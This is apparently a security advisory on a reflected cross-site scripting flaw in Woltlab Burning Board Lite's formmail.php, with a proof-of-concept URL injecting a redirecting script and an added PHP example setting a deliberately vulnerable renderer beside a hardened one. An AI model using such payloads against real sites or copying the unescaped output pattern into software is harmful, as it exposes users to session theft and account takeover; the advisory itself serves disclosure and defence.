
Security Advisory: Woltlab Burning Board Lite (WBB Lite) formmail.php XSS

Advisory Information
--------------------

Advisory name         :  Woltlab Burning Board Lite formmail.php XSS
Discovered by         :  drhankey / it-security23.net
Vendor Name           :  Woltlab
Vendor Homepage       :  http://www.woltlab.de
Software              :  Woltlab Burning Board Lite
Vulnerability Type    :  Cross-Site Scripting (reflected)
Vulnerable Versions   :  1.0.0, 1.0.1e, possibly others
Platforms             :  OS independent, PHP

What is Woltlab Burning Board Lite?
----------------------------------

Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,
a PHP-based bulletin board.

Vulnerability Description:
-------------------------

formmail.php writes the "userid" request parameter into its output without
filtering or encoding it. Because the value lands inside an HTML attribute,
a crafted link can close that attribute and append arbitrary HTML and script,
which then runs in the browser of anyone who follows the link (reflected
cross-site scripting).

The board also accepts stolen cookies for login: a session cookie captured
through this XSS can simply be replayed to log in as the victim.


Proof of Concept:
-----------------

http://website/board/formmail.php?userid=1"><script>document.location.href="http://www.it-security23.net";x="y

The payload closes the attribute the userid value is written into with ">,
injects a script tag that sends the victim to an attacker-chosen site, and
the trailing x="y swallows the remainder of the original attribute so the
page still parses.
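The following is an added, illustrative PHP example and not Woltlab's code: it reconstructs the vulnerable pattern the advisory describes (a request parameter echoed unescaped into a form field) beside a hardened version, and shows the session-cookie flags that limit what a stolen cookie is worth. The hidden-field markup, the parameter name handling, the attacker.example host and the function names are assumptions made for the demonstration.

```php
<?php
// Illustrative reconstruction (assumed markup, not the board's own source):
// a formmail-style page that reflects the "userid" query parameter into a
// hidden form field.

// --- Vulnerable pattern (what the advisory describes) ---
function render_vulnerable(array $get): string
{
    $userid = $get['userid'] ?? '';
    // The raw value lands inside a double-quoted attribute with no escaping.
    // A userid of   1"><script>...</script><x y="   closes the attribute and
    // injects markup that the victim's browser executes.
    return '<input type="hidden" name="userid" value="' . $userid . '">';
}

// --- Hardened pattern ---
function render_hardened(array $get): string
{
    // 1. userid is a numeric identifier: reject anything else before use.
    $raw = $get['userid'] ?? '';
    if (!preg_match('/^\d{1,10}$/', $raw)) {
        http_response_code(400);
        return 'invalid userid';
    }
    $userid = (int) $raw;

    // 2. Encode on output anyway (defence in depth): ENT_QUOTES turns both
    //    " and ' into entities, so the value can never close the attribute
    //    even if the validation above is later loosened.
    $safe = htmlspecialchars((string) $userid, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="userid" value="' . $safe . '">';
}

// Session-cookie settings that reduce the impact of a successful XSS:
// HttpOnly keeps document.cookie from reading the session id, Secure keeps it
// off plaintext HTTP, use_only_cookies blocks session ids passed in the URL.
// These must be set before session_start().
function harden_session_cookie(): void
{
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');
    ini_set('session.use_only_cookies', '1');
    session_start();
}

// Demo with a constructed payload of the same shape as the advisory's PoC
// (attacker.example is a placeholder host).
$payload = '1"><script>document.location.href="http://attacker.example/";x="y';
echo render_vulnerable(['userid' => $payload]), PHP_EOL;
echo render_hardened(['userid' => $payload]), PHP_EOL;
echo render_hardened(['userid' => '1']), PHP_EOL;
```

Run it with `php example.php` and compare the first two lines: the vulnerable renderer emits a closed attribute followed by a live script tag, the hardened one refuses the request. Note that HttpOnly only stops the script from reading the cookie; injected script can still issue requests that carry the victim's session, so output encoding remains the actual fix and the cookie flags are a damage limiter, not a substitute.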
